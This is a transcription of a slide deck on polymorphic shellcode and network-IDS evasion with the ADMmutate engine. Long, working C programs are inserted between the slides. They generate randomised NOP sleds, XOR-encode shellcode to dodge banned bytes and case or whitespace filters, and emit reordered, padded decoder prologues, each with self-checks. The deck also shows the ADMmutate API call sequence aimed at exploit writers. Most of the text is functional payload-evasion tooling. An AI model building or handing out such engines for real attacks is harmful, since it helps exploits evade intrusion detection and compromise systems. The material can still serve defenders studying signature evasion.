Polymorphic Shellcode - PowerPoint PPT Presentation

1
Polymorphic Shellcode
  • By K2 (ktwo_at_ktwo.ca)

2
Topics
  • NIDS Evasion
  • Polymorphic properties
  • Buffer Overflows
  • Implementations
  • SMART features
  • Future

3
NIDS Functions
  • Alarm to suspicious events
  • Usually defined by rule and signature criteria
  • Configured to look for known events
  • New vulnerabilities appear weekly
  • Statistical analysis
  • Can false-alarm frequently
  • It's a hard job!

4
NIDS Evasion
  • Network layer
    • IP fragmentation
    • Spoofed data
  • Application layer
    • Data obfuscation
      • Unicode
      • Alternate operators (e.g. .. and .\.)
      • Code/data encoding
      • Polymorphism

5
Polymorphic properties
  • Polymorphism
    • The ability to exist in multiple forms
    • There is more than one way to perform the same
      function
  • Out-of-order execution
  • Non-operational code padding
  • Random in nature

6
Shellcode
  • NOPs
    • Alignment
    • Padding for the offset jump
    • 1 byte long
    • Usually (on IA32) 0x90
  • Shellcode
    • OS specific
    • Executes our instructions

7
Shellcode cont
  • Offset values
    • Specify the location of the NOPs/shellcode
    • Unique to the host
    • Host configuration can require modified offset
      values
  • IDS usually target the NOP or shellcode sequences for
    signature generation

8
Polymorphic Shellcode
  • NOP substitution
    • Any one-byte instruction can accomplish the same
      function
    • So long as no illegal operation is performed
    • Multi-byte instructions can be used if every byte
      of them also decodes to a valid single-byte
      instruction, so that landing on any byte of the
      sled is safe
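
The NOP-substitution idea above, as an added example in C (not code from the slides or from ADMmutate): a generator draws sled bytes from a table of harmless one-byte IA32 instructions, sometimes wrapped in a two-byte `mov al,imm8` / `test al,imm8` whose immediate is itself a table byte, and a checker walks the sled from every byte offset to confirm that each entry point decodes cleanly and lands exactly on the first shellcode byte. The opcode table, the xorshift PRNG, the `demo_sled` helper and the constructed test sleds are the example's own choices; the checker only knows the opcodes the generator can emit.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One-byte IA32 instructions usable in place of 0x90.  All are harmless as long
 * as the shellcode does not depend on the prior contents of eax/ecx/edx/ebx/ebp/
 * esi/edi or the flags (assumption of this example).  Deliberately excluded:
 * 0x44 inc esp, 0x4c dec esp, 0x94 xchg eax,esp (they move the stack pointer)
 * and anything that can fault. */
static const uint8_t nop_table[] = {
    0x90,                                /* nop */
    0x27, 0x2f, 0x37, 0x3f,              /* daa, das, aaa, aas */
    0x40, 0x41, 0x42, 0x43,              /* inc eax, ecx, edx, ebx */
    0x45, 0x46, 0x47,                    /* inc ebp, esi, edi */
    0x48, 0x49, 0x4a, 0x4b,              /* dec eax, ecx, edx, ebx */
    0x4d, 0x4e, 0x4f,                    /* dec ebp, esi, edi */
    0x91, 0x92, 0x93, 0x95, 0x96, 0x97,  /* xchg eax, ecx/edx/ebx/ebp/esi/edi */
    0x98, 0x99,                          /* cwde, cdq */
    0x9e, 0x9f,                          /* sahf, lahf */
    0xf5, 0xf8, 0xf9, 0xfc,              /* cmc, clc, stc, cld */
};
#define NOP_TABLE_LEN (sizeof nop_table / sizeof nop_table[0])

/* Two-byte forms "opcode imm8": 0xb0 mov al,imm8 and 0xa8 test al,imm8.  The
 * generator always takes the imm8 from nop_table, so entering the sled on the
 * second byte executes a valid one-byte instruction instead. */
static int is_imm8_head(uint8_t b) { return b == 0xb0 || b == 0xa8; }

static int is_single_nop(uint8_t b) {
    for (size_t i = 0; i < NOP_TABLE_LEN; i++)
        if (nop_table[i] == b) return 1;
    return 0;
}

/* xorshift32, deterministic for the example; a real engine should use a CSPRNG. */
static uint32_t xs32(uint32_t *s) {
    uint32_t x = *s ? *s : 0x9e3779b9u;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    return *s = x;
}

/* Fill out[0..n) with a sled; returns the number of bytes written. */
size_t gen_sled(uint8_t *out, size_t n, uint32_t seed) {
    size_t i = 0;
    while (i < n) {
        uint32_t r = xs32(&seed);
        uint8_t filler = nop_table[(r >> 3) % NOP_TABLE_LEN];
        /* A two-byte form is only emitted when both bytes fit: an imm8 head as
         * the last sled byte would swallow the first shellcode byte. */
        if (n - i >= 2 && (r & 3) == 0) {
            out[i++] = (r & 4) ? 0xb0 : 0xa8;
            out[i++] = filler;
        } else {
            out[i++] = filler;
        }
    }
    return i;
}

/* Walk the sled the way the CPU would, starting at `entry`.  Returns 1 if every
 * instruction is one we know to be harmless and execution lands exactly on
 * sled[n], i.e. the first shellcode byte. */
static int entry_ok(const uint8_t *sled, size_t n, size_t entry) {
    size_t pc = entry;
    while (pc < n) {
        if (is_single_nop(sled[pc])) pc += 1;
        else if (is_imm8_head(sled[pc]) && pc + 1 < n) pc += 2;
        else return 0;  /* unknown opcode, or an imm8 head that overruns the sled */
    }
    return pc == n;
}

/* The return address never hits the sled at a known offset, so every byte must be a valid entry. */
int sled_all_entries_ok(const uint8_t *sled, size_t n) {
    for (size_t e = 0; e < n; e++)
        if (!entry_ok(sled, n, e)) return 0;
    return 1;
}

/* How many bytes equal b: shows how little of a "\x90\x90\x90..." signature is left. */
size_t count_byte(const uint8_t *buf, size_t n, uint8_t b) {
    size_t c = 0;
    for (size_t i = 0; i < n; i++) c += (buf[i] == b);
    return c;
}

/* Generate an n-byte sled (1 <= n <= 256) and return 1 if it passes both checks. */
int demo_sled(uint32_t seed, size_t n) {
    uint8_t sled[256];
    if (n == 0 || n > sizeof sled) return 0;
    return gen_sled(sled, n, seed) == n
        && sled_all_entries_ok(sled, n)
        && count_byte(sled, n, 0x90) < n;
}

int main(void) {
    uint8_t sled[32];
    size_t n = gen_sled(sled, sizeof sled, 0x1234567u);
    for (size_t i = 0; i < n; i++) printf("%02x ", sled[i]);
    printf("\nall entries valid: %d, 0x90 bytes: %zu/%zu\n",
           sled_all_entries_ok(sled, n), count_byte(sled, n, 0x90), n);
    return 0;
}
```

The checker is the part worth keeping: a sled that fails `sled_all_entries_ok` (a stray `int3`, an `inc esp`, or a two-byte form as the very last byte) will crash on some offsets and work on others, which looks like a flaky exploit rather than a bad sled.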

9
Shellcode encoding
  • Shellcode is encoded to avoid a pattern match
    • e.g. on the string /bin/sh
  • SMART features
    • Can be engineered to conform to many restrictions
    • Survives toupper(), tolower(), isspace()
    • Misc. banned characters
  • Must be decoded on the target host
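
Encoding under host restrictions, as an added example in C (not the deck's or ADMmutate's code): a 32-bit XOR key is found one byte lane at a time so that the encoded shellcode, and the key bytes the decoder has to carry, contain no banned byte and would not be altered by toupper()/tolower()/isspace()-style handling; the buffer is then decoded again the way the stub does on the target. The `encctl` struct, the `RESTRICT_*` flags, the lane-wise search and the constructed sample payload are the example's own; the 32-bit key split into byte lanes follows the deck's later note that the key is 32 bits built from two 16-bit halves.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Restrictions the encoded bytes must survive on the way to the target
 * (flag names are this example's own). */
enum { RESTRICT_TOUPPER = 1, RESTRICT_TOLOWER = 2, RESTRICT_ISSPACE = 4 };

struct encctl {
    const uint8_t *banned;  /* bytes that must not appear in the encoded buffer */
    size_t nbanned;
    unsigned flags;         /* bitmask of RESTRICT_* */
};

/* Will byte b reach the decoder unchanged? */
static int byte_allowed(uint8_t b, const struct encctl *c) {
    for (size_t i = 0; i < c->nbanned; i++)
        if (c->banned[i] == b) return 0;
    if ((c->flags & RESTRICT_TOUPPER) && b >= 'a' && b <= 'z') return 0;  /* would be upcased */
    if ((c->flags & RESTRICT_TOLOWER) && b >= 'A' && b <= 'Z') return 0;  /* would be downcased */
    if ((c->flags & RESTRICT_ISSPACE) && (b == ' ' || (b >= '\t' && b <= '\r'))) return 0;
    return 1;
}

static uint32_t xs32(uint32_t *s) {  /* deterministic PRNG for the example */
    uint32_t x = *s ? *s : 0x9e3779b9u;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    return *s = x;
}

/* Output byte i depends only on key byte i % 4, so each lane is solved on its
 * own: try all 256 values from a random start and keep the first that maps
 * every input byte of this lane to an allowed byte.  The key byte itself must
 * be allowed too, since it travels inside the decoder.  Returns -1 on failure. */
static int find_lane_key(const uint8_t *in, size_t n, size_t lane,
                         const struct encctl *c, uint32_t *seed) {
    uint32_t start = xs32(seed);
    for (unsigned t = 0; t < 256; t++) {
        uint8_t k = (uint8_t)(start + t);
        if (k == 0 || !byte_allowed(k, c)) continue;   /* k == 0 would not encode */
        int ok = 1;
        for (size_t i = lane; i < n && ok; i += 4) ok = byte_allowed(in[i] ^ k, c);
        if (ok) return k;
    }
    return -1;
}

/* Choose the 32-bit key and encode.  Returns 1 and stores the key on success,
 * 0 if the restrictions cannot be met (caller must not use out[]). */
int encode_shellcode(const uint8_t *in, size_t n, uint8_t *out, uint32_t *key_out,
                     const struct encctl *c, uint32_t seed) {
    uint8_t k[4];
    for (size_t lane = 0; lane < 4; lane++) {
        int r = find_lane_key(in, n, lane, c, &seed);
        if (r < 0) return 0;
        k[lane] = (uint8_t)r;
    }
    for (size_t i = 0; i < n; i++) out[i] = in[i] ^ k[i % 4];
    *key_out = (uint32_t)k[0] | (uint32_t)k[1] << 8 | (uint32_t)k[2] << 16 | (uint32_t)k[3] << 24;
    return 1;
}

/* What the decoder stub does on the target host, written in C. */
void decode_shellcode(uint8_t *buf, size_t n, uint32_t key) {
    for (size_t i = 0; i < n; i++) buf[i] ^= (uint8_t)(key >> (8 * (i % 4)));
}

int buffer_allowed(const uint8_t *buf, size_t n, const struct encctl *c) {
    for (size_t i = 0; i < n; i++)
        if (!byte_allowed(buf[i], c)) return 0;
    return 1;
}

/* Constructed sample payload, not real shellcode: the "/bin/sh" string a
 * signature would key on, NULs, a high byte, a newline, a space, mixed case. */
static const uint8_t sample[] = { '/', 'b', 'i', 'n', '/', 's', 'h', 0x00,
                                  0x00, 0xff, 0x0a, 0x20, 'A', 'a' };

/* Round trip under "no NUL, no newline, toupper() on the way in".  Returns 1 if
 * the encoded buffer is clean, differs from the input, and decodes back exactly. */
int demo_roundtrip(uint32_t seed) {
    static const uint8_t banned[] = { 0x00, 0x0a };
    struct encctl c = { banned, sizeof banned, RESTRICT_TOUPPER };
    uint8_t enc[sizeof sample];
    uint32_t key;
    if (!encode_shellcode(sample, sizeof sample, enc, &key, &c, seed)) return 0;
    if (!buffer_allowed(enc, sizeof sample, &c)) return 0;
    if (memcmp(enc, sample, sizeof sample) == 0) return 0;
    decode_shellcode(enc, sizeof sample, key);
    return memcmp(enc, sample, sizeof sample) == 0;
}

/* Impossible filter (every byte banned): the encoder must fail, not emit junk. */
int demo_unsatisfiable(void) {
    uint8_t all[256], enc[sizeof sample];
    uint32_t key;
    for (unsigned i = 0; i < 256; i++) all[i] = (uint8_t)i;
    struct encctl c = { all, sizeof all, 0 };
    return encode_shellcode(sample, sizeof sample, enc, &key, &c, 7u);
}

int main(void) {
    printf("roundtrip ok: %d, unsatisfiable rejected: %d\n",
           demo_roundtrip(0xc0ffeeu), demo_unsatisfiable() == 0);
    return 0;
}
```

Two things carry over to a real engine: the key bytes are subject to the same filter as the payload, because they are embedded in the decoder that travels through the same path, and the decoder stub's own opcodes (not modelled here) need the same check.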

10
Decoder generation
  • Must possess polymorphic properties
  • Alternate instruction paths / out-of-order
    execution
    • A B C D
    • B C A D
  • More than one way to calculate a result
    • 2 + 2 = 4
    • 8 / 2 = 4

11
Decoder generation
  • Operational padding
    • A B C D
    • A (2+1-3) B (-3+3) (3-3) C D
  • Wildcard code generation
    • or eax, X
    • add eax, X
    • xchg eax, X
    • eax is treated as free (dead), so X can take any value
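
The decoder-generation properties on the two slides above (out-of-order execution, more than one way to compute a value, operational padding on a dead register), as an added example in C that is not the deck's or ADMmutate's code: a prologue that loads ecx with the length, edx with the key and zeroes ebx is emitted with the three independent loads randomly permuted, each in one of two equivalent encodings, with eax-only padding such as `add eax,X; sub eax,X` in front of each. A tiny model of the few IA32 instructions emitted then executes the bytes to show that every mutation leaves ecx, edx and ebx in the same state. The opcode set, the register assignment and the `struct cpu` model are the example's own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint32_t xs32(uint32_t *s) {  /* deterministic PRNG for the example */
    uint32_t x = *s ? *s : 0x9e3779b9u;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    return *s = x;
}
static size_t put32(uint8_t *o, uint32_t v) {  /* little-endian imm32 */
    for (int i = 0; i < 4; i++) o[i] = (uint8_t)(v >> (8 * i));
    return 4;
}
static uint32_t get32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Operational padding.  eax is treated as dead, so anything touching only eax
 * and the flags is a no-op for the decoder; the last form is the slide's
 * "(2+1-3)": add a value, then subtract it again. */
static size_t emit_pad(uint8_t *o, uint32_t r, uint32_t m) {
    size_t t = 0;
    switch (r & 7) {
    case 0: break;                                             /* nothing */
    case 1: o[t++] = 0x90; break;                              /* nop */
    case 2: o[t++] = 0x40; break;                              /* inc eax */
    case 3: o[t++] = 0x48; break;                              /* dec eax */
    case 4: o[t++] = 0x0d; t += put32(o + t, m); break;        /* or  eax, m */
    case 5: o[t++] = 0x05; t += put32(o + t, m); break;        /* add eax, m */
    case 6: o[t++] = 0x35; t += put32(o + t, m); break;        /* xor eax, m */
    default: o[t++] = 0x05; t += put32(o + t, m);              /* add eax, m */
             o[t++] = 0x2d; t += put32(o + t, m); break;       /* sub eax, m */
    }
    return t;
}

/* Decoder prologue leaving ecx = len, edx = key, ebx = 0.  The three loads are
 * independent, so they go out in random order, each in one of two equivalent
 * encodings, with padding in front.  Returns the length, or 0 on overflow. */
size_t gen_prologue(uint8_t *out, size_t cap, uint32_t len, uint32_t key, uint32_t seed) {
    int order[3] = { 0, 1, 2 };
    size_t n = 0;
    for (int i = 2; i > 0; i--) {                              /* Fisher-Yates shuffle */
        int j = (int)(xs32(&seed) % (uint32_t)(i + 1)), tmp = order[i];
        order[i] = order[j]; order[j] = tmp;
    }
    for (int b = 0; b < 3; b++) {
        uint8_t t[24]; size_t k = 0;
        uint32_t r = xs32(&seed), m = xs32(&seed);
        k += emit_pad(t, r, m);
        switch (order[b]) {
        case 0:
            t[k++] = 0xb9; k += put32(t + k, (r & 0x100) ? len : len + m);           /* mov ecx, len[+m] */
            if (!(r & 0x100)) { t[k++] = 0x81; t[k++] = 0xe9; k += put32(t + k, m); } /* sub ecx, m */
            break;
        case 1:
            t[k++] = 0xba; k += put32(t + k, (r & 0x100) ? key : key ^ m);           /* mov edx, key[^m] */
            if (!(r & 0x100)) { t[k++] = 0x81; t[k++] = 0xf2; k += put32(t + k, m); } /* xor edx, m */
            break;
        default:
            t[k++] = (r & 0x100) ? 0x31 : 0x29; t[k++] = 0xdb;                       /* xor|sub ebx, ebx */
        }
        if (n + k > cap) return 0;
        memcpy(out + n, t, k); n += k;
    }
    return n;
}

/* Model of only the IA32 instructions the generator emits.  r[] holds
 * eax, ecx, edx, ebx in encoding order.  Returns 0 on an unknown opcode. */
struct cpu { uint32_t r[4]; };

int simulate(const uint8_t *c, size_t n, struct cpu *cpu) {
    size_t pc = 0;
    while (pc < n) {
        uint8_t op = c[pc], modrm = pc + 1 < n ? c[pc + 1] : 0;
        if (op == 0x90) pc += 1;                                                      /* nop */
        else if (op >= 0x40 && op <= 0x4b && (op & 7) <= 3) {                        /* inc/dec r32 */
            cpu->r[op & 7] += (op < 0x48) ? 1u : 0xffffffffu; pc += 1;
        } else if (op >= 0xb8 && op <= 0xbb && pc + 5 <= n) {                        /* mov r32, imm32 */
            cpu->r[op - 0xb8] = get32(c + pc + 1); pc += 5;
        } else if ((op == 0x05 || op == 0x0d || op == 0x2d || op == 0x35) && pc + 5 <= n) {
            uint32_t imm = get32(c + pc + 1);                                         /* add/or/sub/xor eax, imm32 */
            if (op == 0x05) cpu->r[0] += imm; else if (op == 0x0d) cpu->r[0] |= imm;
            else if (op == 0x2d) cpu->r[0] -= imm; else cpu->r[0] ^= imm;
            pc += 5;
        } else if (op == 0x81 && pc + 6 <= n && (modrm & 0xc0) == 0xc0 && (modrm & 7) <= 3) {
            uint32_t imm = get32(c + pc + 2);                                         /* 81 /5 sub, /6 xor r32, imm32 */
            if (((modrm >> 3) & 7) == 5) cpu->r[modrm & 7] -= imm;
            else if (((modrm >> 3) & 7) == 6) cpu->r[modrm & 7] ^= imm;
            else return 0;
            pc += 6;
        } else if ((op == 0x31 || op == 0x29) && pc + 2 <= n && (modrm & 0xc0) == 0xc0
                   && (modrm & 7) <= 3 && ((modrm >> 3) & 7) <= 3) {                 /* xor/sub r32, r32 */
            uint32_t src = cpu->r[(modrm >> 3) & 7];
            if (op == 0x31) cpu->r[modrm & 7] ^= src; else cpu->r[modrm & 7] -= src;
            pc += 2;
        } else return 0;
    }
    return 1;
}

/* Generate with `seed`, run on a model CPU full of garbage, and check what the
 * decoder body relies on: ecx, edx and ebx.  eax may end up anywhere. */
int demo_prologue(uint32_t len, uint32_t key, uint32_t seed) {
    uint8_t code[80];
    struct cpu cpu = { { 0xdeadbeefu, 0x11111111u, 0x22222222u, 0x33333333u } };
    size_t n = gen_prologue(code, sizeof code, len, key, seed);
    if (n == 0 || !simulate(code, n, &cpu)) return 0;
    return cpu.r[1] == len && cpu.r[2] == key && cpu.r[3] == 0;
}
```

Calling `gen_prologue` with different seeds gives byte strings of different lengths and orderings, which is what defeats a fixed decoder signature; `simulate` is the regression check that the mutations stay semantically identical, the property a real engine should test for every variant it can produce.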

12
Optional functions
  • Offset modulation
    • Automatically modulate the offset for a smaller
      signature hit
  • Truncate the buffer to clean up any binary chaff
  • Output to a C-style array to aid analysis

13
Implementation details
  • API for exploit coders
    • Filter for kiddie lusers
  • Black box
    • Shellcode can be of variable size
    • OS independent
  • 32-bit key/calculations
    • 2 16-bit keys
  • 1KB shellcode size limit
    • May be increased in future

14
API Notes
  • Currently supports IA32, SPARC, HPPA
  • MIPS, Alpha, PowerPC under development
  • Easily extended
    • Add a decoder structure
    • Implement hardcoded offset/jump calculations

15
API Details
  • Simply add:

    #include "ADMmutapi.h"
    struct morphctl mut;
    mut.upper = 0; mut.lower = 0; mut.banned = 0;
    struct morphctl *mctlp = &mut;
    mut.arch = IA32; /* select architecture */
    init_mutate(mctlp);
    apply_key(buff, strlen(shellcode), nops, mctlp);
    apply_jnops(buff, nops, mut);
    apply_engine(buff, strlen(shellcode), nops, mut);
    ...

16
Future development
  • Updates?
    • http://www.ktwo.ca/security.html
    • ftp://ADM.freelsd.net/pub/ADM
  • Can we produce code/data that can evade
    statistical analysis?
    • Sliding key?
    • Multiple ciphers?

17
Questions?
  • Does it work?
  • Yes. :)